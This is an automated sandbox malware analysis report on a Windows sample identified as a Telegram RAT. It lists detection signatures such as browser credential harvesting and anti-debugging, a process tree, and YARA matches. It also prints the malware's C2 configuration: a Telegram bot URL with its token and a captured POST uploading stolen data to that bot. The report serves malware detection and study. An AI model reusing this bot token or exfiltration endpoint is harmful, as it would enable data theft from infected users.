Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	1301561
MD5:	42ba63deb6c8bfdd80b696e533ee9f2a
SHA1:	08b4a60367f8b4220a0d0116f57a7fcfce6ed402
SHA256:	21137e9491dedb0adf2088857f7cff726c5864c9c263d1e50740355ab62e3fdf
Tags:	exe
Infos:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Telegram RAT

Uses the Telegram API (likely for C&C communication)

May check the online IP address of the machine

DLL side loading technique detected

Potentially malicious time measurement code found

Tries to harvest and steal browser information (history, passwords, etc)

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Queries information about the installed CPU (vendor, model number etc)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Drops PE files

Uses a known web browser user agent for HTTP communication

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

PE file contains more sections than normal

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

file.exe (PID: 6828 cmdline: C:\Users\user\Desktop\file.exe MD5: 42BA63DEB6C8BFDD80B696E533EE9F2A)

test.exe (PID: 6860 cmdline: C:\Users\user\Desktop\file.exe MD5: BA25C8AF9DD114244EC83C9F6B0D12EB)

test.exe (PID: 6884 cmdline: C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=552 MD5: BA25C8AF9DD114244EC83C9F6B0D12EB)

test.exe (PID: 6892 cmdline: C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=716 MD5: BA25C8AF9DD114244EC83C9F6B0D12EB)

cmd.exe (PID: 7004 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 7044 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

test.exe (PID: 6912 cmdline: C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=636 MD5: BA25C8AF9DD114244EC83C9F6B0D12EB)

test.exe (PID: 6928 cmdline: C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=640 MD5: BA25C8AF9DD114244EC83C9F6B0D12EB)

test.exe (PID: 6944 cmdline: C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=736 MD5: BA25C8AF9DD114244EC83C9F6B0D12EB)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6484593640:AAElkexVP5gtsGF4EFBznaQGVxdfqLlGG3s/sendMessage"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.219390859.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.219363316.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000000.209539589.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000000.212189614.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000000.209057269.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000000.210593944.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000000.211333071.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000000.207348284.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.219304449.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.219197373.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.219282036.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author
1.0.test.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.test.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.0.test.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.0.test.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.0.test.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.0.test.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.test.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.test.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.test.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.0.test.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.test.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.test.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 7 entries

HTTP traffic detected: POST /bot6484593640:AAElkexVP5gtsGF4EFBznaQGVxdfqLlGG3s/sendDocument HTTP/1.1Accept-Encoding: identityContent-Length: 656063Host: api.telegram.orgUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11Content-Type: multipart/form-data; boundary=4c49b1f3a67a4c2585c4e333b5fb8eabConnection: close

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://bugs.python.org/issue14443z
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: test.exe, 00000001.00000002.231496986.0000000006869000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000003.228596155.0000000006868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl
Source: test.exe, 00000001.00000003.228724835.0000000005790000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230936770.0000000005790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
Source: test.exe, 00000001.00000002.231004794.00000000057C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://json.org
Source: test.exe, 00000001.00000003.228550797.00000000066E1000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.231400935.00000000066E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://logo.veris
Source: test.exe, 00000001.00000003.228550797.00000000066E1000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.231400935.00000000066E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://logo.verisign.coz
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: test.exe, 00000001.00000002.231304232.00000000064C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://speleotrove.com/decimal/decarith.html
Source: file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, test.exe, 00000001.00000002.231129087.00000000062A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: test.exe, 00000001.00000002.231304232.00000000064C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/character-sets
Source: test.exe, 00000001.00000003.228724835.0000000005790000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230936770.0000000005790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, test.exe, 00000001.00000002.231129087.00000000062A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://wwwsearch.sf.net/):
Source: test.exe, 00000001.00000002.231367576.0000000006660000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6484593640:AAElkexVP5gtsGF4EFBznaQGVxdfqLlGG3s/sendDocument
Source: test.exe, 00000001.00000002.231367576.0000000006660000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6484593640:AAElkexVP5gtsGF4EFBznaQGVxdfqLlGG3s/sendDocumentP
Source: test.exe, 00000001.00000002.231304232.00000000064C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v6/users/
Source: test.exe, 00000001.00000002.230840850.00000000056D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mahler:8092/site-updates.py
Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: test.exe, 00000001.00000002.231915752.00007FFD40522000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: https://python.org/dev/peps/pep-0263/
Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: https://upload.pypi.org/legacy/
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: test.exe, 00000001.00000003.224812362.0000000006725000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=.net
Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: https://www.ibm.com/
Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: https://www.ibm.com/support/knowledgecenter/en/ssw_aix_61/com.ibm.aix.basetrf1/dlopen.htm
Source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: https://www.ibm.com/support/knowledgecenter/en/ssw_aix_61/com.ibm.aix.basetrf1/load.htm
Source: file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235504122.0000000003519000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.232284330.00007FFD40C2A000.00000002.00000001.01000000.00000011.sdmp, test.exe, 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: test.exe, 00000001.00000002.230840850.00000000056D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/
